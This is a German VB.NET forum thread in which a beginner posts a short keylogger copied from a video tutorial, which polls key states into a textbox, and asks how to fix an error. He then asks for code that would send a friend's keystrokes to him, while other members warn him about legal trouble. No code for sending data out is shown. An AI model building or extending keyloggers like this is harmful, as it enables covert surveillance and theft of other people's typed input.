Komischer Fehler

  • VB.NET

Es gibt 21 Antworten in diesem Thema. Der letzte Beitrag () ist von *Zyo*.

    Komischer Fehler

    Hi ich habe gestern ein spammer und einen keygen in vb8 gemacht

    heute wollte ich mal einen Keylogger machen nach seinem source code

    youtube.com/watch?v=DQB-PIBHAjA&feature=related

    habe ich auch gemacht soure code sieht so aus

    VB.NET-Quellcode

    1. Public Class Form1
    2. Dim result As Integer
    3. Private Declare Function GetAsyncKeyStats Lib "user32" (ByVal vKey As Long) As Integer
    4. Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
    5. Timer1.Start()
    6. End Sub
    7. Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
    8. For i = 1 To 255
    9. result = 0
    10. result = GetAsyncKeyStats(i)
    11. If result = -32767 Then
    12. TextBox1.Text = TextBox1.Text + Chr(i)
    13. End If
    14. Next i
    15. End Sub
    16. End Class



    und wen ich debugge udn testen will kommt ein error der heist

    [url=http://www.abload.de/image.php?img=keyloggererrorjocz.jpg][/url]

    wie bekomme ich den error bzw fehler weg ?( ich habe windows xp Home sp 2 :thumbup:
    Hai !
    Schau mal ob du wörklich alle Variablen richtig Deklariert hast, fehtl dir da nicht auf !

    Nicht bös gemeint aber ich sehe keine sinn dir weiter zu helfen, fange mit Grundlagen der Programmierung an.

    Die Einfacheren Fehler solltest du schon beheben können was die Deklaration von Variablen angeht !


    mfg Alex

    EDIT:NEU EDITIERT !

    Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von „Alex2000“ ()

    @Alex 2000: Also anstatt jedem, der hier in diesem Forum eine Frage stellt, vorzuhalten, er solle erst mal "richtig" Programmieren lernen, könntest du mal eine konstruktive Antwort geben. Bisher habe ich noch keine Antwort von Dir gesehen, die einen wirklich weiterbringt.

    Außerdem ist sein Code, soweit ich das vergleichen konnte, 1:1 der Vorlage aus dem Video. Und dort funktioniert es. Sein Hilfe-Gesuch in diesem Forum ist meiner Meinung nach also durchaus angebracht. Wenn du ihm also wirklich helfen willst, und nicht nur Postings sammelst, dann mach es gescheit; und nicht so überheblich!!
    @manschula: Danke für die Bemerkung !
    Aber ich meine nur zum gutes, aber manche verstehen das nicht, es bringt nichts, wenn ich eine Code kopiere, und weis dabei nicht was eine Globale oder Lokale variable. Wenn ich weiter helfe dann wird noch weiter gemeckert. Also dann brauche ich mit Progen kann nicht anfangen !

    Mfg Alex
    Das stimmt. Aber lern man nicht am besten durch Learning-by-doing? Das Video-Tutorial zeigt auf einfache Weise das Erstellen eines Keyloggers, es funktioniert... nur bei Ihm nicht. Also wendet er sich an dieses Forum hier.

    Mir sind in letzter Zeit einfach die "aggressiven" (?) Antworten von Alex aufgefalle, und wollt jetzt und das sollte nicht böse sein, mal was sagen.
    @manschula: das höre ich nicht zum ersten mal. Aber eine dumme Frage, warum meint Ihr das ich aggressiv antworte, ich will jetzt darüber nicht streiten ! ;)
    Ich gebe antworten was dem realität entspricht. Helfe sehr gern wenn einer oder anderer wörklich sich bemüht und das siehd man.
    Also lernen von irgen-welche Videos oder kopieren von irgend-wo Code und dann hier meckern, bringts überhaupt nicht. Wenns um lernen geht dann besorgt man paar Bücher und fängt von vorne an, und nicht gleich mit irgend-welchen KeyLogger oder so änliches anfängt zu programmieren.
    Es gibs genügend Hilfe für die Anfänger im Online. So und ich sehe kein Grund das meine Antworten auf bestimmten Fragen "aggresiv" oder "bös" einzustufen.

    Mfg Alex


    EDIT: NEU EDITIERT
    @Alle
    Ich meine jeder lernt anders, es gibt welche die es lernen wenn:
    • sie es sehen.
    • sie es probieren und herum experimentieren.
    • sie es lesen.
    • es ihnen erklärt wird.
    • und anderes
    Außerdem finde ich es sch.... wenn man jemanden hier "niedermacht" nur weil er sich nicht irgend einen Buch durchgelesen hat, weil er vielleicht anders besser lernt. Der Punkt ist aber er hat euch bzw. die ganz Community gefragt ob ihr/ sie ihm helfen kann!
    Ich respektiere hier jeden, da jeder seine Gründe dafür hat warum er es so oder so macht, aber muss man immer nur Rummeckern nur weil jemand nicht so lernt wie ihr es tut? Man kann es auch verstehen wenn man genervt ist weil jemand nicht 24 Stunden lang gegoogelt hat oder das Forum durchsucht hat bevor er das Thema eröffnet hat, aber es könnte ja möglich sein das er vielleicht den falschen Suchbegriff eingegeben hat.
    EDIT: Außerdem wenn man sich in jedem Thema streitet bekommt der Fragende nie eine korrekte richtige Antwort ;) , also vertragt euch und respektiert einandern dann klappt das schon :D
    Das ist meine Meinung dazu !
    MFG xXLinkeXx
    CODE DELETE
    ich hoffe das du damit klar kommst, wenn du schon eine Code abschreibst dann schreib wenigstens richtig ab !

    @xXLinkeXx: hier wird keine niedergamacht, Ihr sollt endlich verstehen das ohne Grundlagen der Programmierung kommt von euch keiner weiter, aber anscheinend sehen das hier weniger ein!

    Mfg Alex

    Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von „Alex2000“ ()

    Alex2000 schrieb:

    ich hoffe das du damit klar kommst, wenn du schon eine Code abschreibst dann schreib wenigstens richtig ab !
    Ja tut mir ja leid das ich dien falschen code abgeschribn hab ;(

    seine maus war wohl auf diesen S da

    Edit: Danke Alex für dein code ets gehts

    habe mal mein freund geschickt aber bei ihm gehst ja ned also es sendet mir keien daten ets bräuchte ich nen code das wen jemand anders was eintippt das die daten zu mir gesendet werden :huh: das es hal ein keylogger ist

    nicht wegen illegalen vorhaben sondern zu testzwecken :!:

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von „*Zyo*“ ()

    Also ich finde es hier iwie schon geil :
    bei dem thread mit dem flooder kommen alle mit ihren moralischen bedenken und hier kommt jemand der euch erzählt das er schon nen spammer und keygen programmiert hat und jetzt nen keylogger-source braucht und es gibt kaum einwenden !!!
    Ausserdem bekommt man keine Anzeige wegen Internet-Spionage wegem posten von so nem Thread ! Er bekommt vllt ne Hausdurchsuchung,Beschlagnahmung des PC oder Online Durchsuchung wegen Verdacht auf Internet-Spionage ;) !
    PS:
    @Zyo:
    An deine Stelle würde ich mit solchen Fragen aufpassen, nicht dass du eine Anzeige am Hals bekommst wegen "Computer Spionage"
    Ob du dass wirklich für Testzwecke benötigst das kannst vieleicht deine Mutter erzählen. Nach meine Ansicht ist (das,es) illegal, und (ich) würde was anderes Programmieren, was wirklich jeden interessieren könnte !
    :D :D ^^ ...das geilste kommt dann wenn vor die Türe zwei Jungs in Umiforms stehen und führen mit Handschelen ab !

    Für mich ist der Thread geschlossen
    Mfg ALex

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von „Alex2000“ ()

    äh wollt ihr mich veraschen

    OMFG wie low ist das denn ich kann mir keylogger rats trojaner auf jeder 2ten seite laden

    ich habs nicht nötig son schrott zu nutzen ich will es nur programmeiren udn dannach löschen

    den ich lerne durch experementieren

    wen ihr mich nicht leiden könnt weil ich eben keine programme code für was weis ich weil ich das nochnicht kann mus ich wol leider das forum verlassen und mir ein anderes suchen wo man schreiebn darf wie ein keylogger source heist tzzz ;(

    Edit: ich kenne so viele gute vb8 und vb6 pro coder die trojaner keylogger Rats etc. etc. coden udn trozdem coden sie auch für firmen wichtige programme

    sollen sie deswegen verhaftet werden rofl es zu coden ist nicht strafbar es zu nutzen ist strafbar also wieso darf ich dann einen keylogger etc. nicht coden ! X(
    hmpf es gibt reichlich sinnvollere aufgaben zum coden ! ob du jetzt leuten bei ihren projekten willst oder die ein eigenes programm überlegst ( zB eigener webbrowser, ein chat oder vieles mehr ) !
    programmier doch lieber sachen die du im alltag brauchst und nicht einen keylogger den du sowieso nicht benutzen willst !
    und du musst ja wohl einsehen das wenn du sachen wie keylogger, spammer oder anderes programmieren willst du auf hackerboards dich anmelden solltest !